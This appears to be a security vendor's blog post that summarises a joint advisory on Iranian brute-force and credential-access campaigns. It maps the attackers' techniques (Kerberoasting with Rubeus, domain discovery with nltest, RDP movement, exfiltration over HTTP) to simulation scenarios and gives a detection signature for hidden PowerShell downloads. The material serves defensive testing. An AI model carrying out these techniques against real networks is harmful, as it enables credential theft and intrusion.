On October 16, 2024, the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), the Communications Security Establishment Canada (CSE), the Australian Federal Police (AFP), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) released a Cybersecurity Advisory (CSA) to warn network defenders of Iranian cyber actors’ use of brute force and other techniques to compromise organizations across multiple critical infrastructure sectors, including the healthcare and public health (HPH), government, information technology, engineering, and energy sectors.

Since October 2023, Iranian actors have used brute force, such as password spraying, and multifactor authentication (MFA) ‘push bombing’ to compromise user accounts and obtain access to organizations. The actors frequently modified MFA registrations, enabling persistent access. The actors performed discovery on the compromised networks to obtain additional credentials and identify other information that could be used to gain additional points of access.

The authoring agencies assess that the Iranian actors likely aim to obtain credentials and information describing the victim’s network, which can then be sold on cybercriminal forums to actors who may use the information to conduct additional malicious activity.

AttackIQ has released a new assessment template that brings together the post-compromise Tactics, Techniques, and Procedures (TTPs) exhibited by these Iranian adversaries during its latest activities to help customers validate their security controls and their ability to defend against this disruptive and destructive threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against a highly opportunistic Initial Access Broker (IAB).
  • Assess your security posture against a threat interested in harvesting profiling and credential information that could be used for subsequent attacks.
  • Continuously validate detection and prevention pipelines against the playbook of a threat specializing in Brute-Forcing and MFA-based attacks.

[CISA AA24-290A] Iranian Cyber Actors’ Brute Force and Credential Access Activity Compromises Critical Infrastructure Organizations

This Assessment Template compiles all those post-compromise Tactics, Techniques, and Procedures (TTPs) exhibited by these Iranian adversaries during its most recent activities.

The assessment template is divided into tactics, grouping the techniques and implementations used by affiliates at each stage of their activities:

1. Defense Evasion

Consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts.

Virtualization/Sandbox Evasion (T1497): This scenario will call the IsDebuggerPresent Windows API to detect the presence of a debugger attached to the current process.

2. Credential Access

Consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping.

Credentials from Password Stores: Windows Credential Manager (T1555.004): This scenario employs the built-in Windows tool cmdkey to discover cached credentials on a system.

Steal or Forge Kerberos Tickets: Kerberoasting (T1558.003): This scenario demonstrates a Kerberoasting attack using Rubeus, which allows an attacker to attempt to extract password hashes for accounts using their Service Principal Name (SPN) ticket.

3. Discovery

Consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act.

Remote System Discovery (T1018): This scenario uses the native nltest utility with the /dclist to enumerate domain controllers associated with a domain.

Domain Trust Discovery (T1482): This scenario uses the native nltest utility with the /trusted_domains to list all the domain trust relationships for the domain associated with the host.

Permission Groups Discovery: Domain Groups (T1069.002): This scenario uses the net.exe utility to list the users of the Domain Admins and Enterprise Admins domain group.

4. Lateral Movement

Consists of techniques that adversaries use to enter and control remote systems on a network.

Remote Services: Remote Desktop Protocol (T1021.001): This scenario attempts to use Remote Desktop Protocol (RDP) to move laterally to additional hosts on the network.

5. Command and Control

Techniques that adversaries may use to communicate with systems under their control within a victim network.

Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

6. Exfiltration

Consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption.

Exfiltration Over C2 Channel (T1041): This scenario simulates the exfiltration of sensitive files using HTTP POST requests.

Opportunities to Expand Emulation Capabilities

In addition to the released assessment template, AttackIQ recommends the following existing scenarios to extend the emulation of the capabilities exhibited in this advisory.

  • Password Brute-Force: This scenario simulates a password brute-force attack on a specified machine to test the effectiveness of security controls against multiple failed login attempts.
  • PCAP Replay – RDP Brute Force: This scenario simulates an RDP brute force attack by replaying network packets between two assets in a controlled environment. The attack consists of 40 login attempts against an RDP server on port 3389/TCP.
  • PCAP Replay – SSH Brute Force: This scenario simulates an SSH brute force attack by replaying network packets between two assets in a controlled environment. The attack consists of 120 login attempts against an SSH server on port 22/TCP.
  • PCAP Replay – SMB Brute Force: This scenario simulates an SMB brute force attack by replaying network packets between two assets in a controlled environment. The attack consists of 222 login attempts against an SMB server on port 445/TCP.
  • PCAP Replay – LDAP Brute Force: This scenario simulates an LDAP brute force by replaying network packets between two assets in a controlled environment. The attack consists of 50 failed login attempts using different passwords for the “admin” user account against an LDAP server on port 389/TCP.
  • PCAP Replay – SMB Password Spraying: This scenario simulates an SMB password spraying attack by replaying network packets between two assets on port 445/TCP. Password spraying is a brute force technique where an attacker tries to log in using a list of usernames with a default or predictable password, avoiding account lockout by attempting only one login per user account.
  • PCAP Replay – LDAP Password Spraying: This scenario simulates an LDAP password spraying attack by replaying network packets between two assets on port 389/TCP. Password spraying is a brute force technique where an attacker tries to log in using a list of usernames with a default or predictable password, avoiding account lockout by attempting only one login per user account.
  • PCAP Replay – Kerberoasting Attack using Impacket’s GetUsersSPNs.py Script: This scenario simulates a Kerberoasting attack using Impacket’s GetUserSPNs.py script by replaying network packets between two assets in a controlled environment. The attack aims to obtain a password hash of an Active Directory (AD) user account with a Service Principal Name (SPN).
  • Zerologon Attack with Mimikatz: This scenario focuses on determining if the domain controller is vulnerable to the critical Zerologon vulnerability using the Mimikatz tool. Note: This scenario attempts to identify and exploit the Zerologon vulnerability. This can impact Domain Controller functions and result in service degradation. It should not be run in a production environment.

Detection and Mitigation Opportunities

Given the number of techniques used by this threat, it can be difficult to know which to prioritize for prevention and detection assessment. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Review CISA’s Patching and Detection Recommendations:

CISA has provided a significant number of recommendations for the best ways to defend yourself from these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations with the goal of adapting them to your environment first to determine if you have any existing impact before reviewing the assessment results.

2. Ingress Tool Transfer (T1105):

Adversaries often rely heavily on downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.

2a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

3. Exfiltration Over C2 Channel (T1041):

Adversaries may perform the exfiltration of sensitive data from the infected host. IDS/IPS and DLP solutions are well suited for detecting and preventing sensitive files from being sent to a suspicious external host.

3a. Detection

In some cases, data may be exfiltrated without any throttling or additional encoding or encryption from the backdoor. If that’s the case, data is sent via HTTP POST requests in plain text and therefore should be easier to detect using Data Loss Prevention controls.

Additionally, since these requests are not throttled, network traffic can be monitored for anomalous traffic flow patterns that can identify single systems, typically client assets that are sending out significant amounts of data.

3b. Mitigation

MITRE ATT&CK has the following mitigation recommendations:

Wrap-up

In summary, this assessment template will evaluate security and incident response processes and support the improvement of your security control posture against this sophisticated threat. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a well-known and dangerous threat.

AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.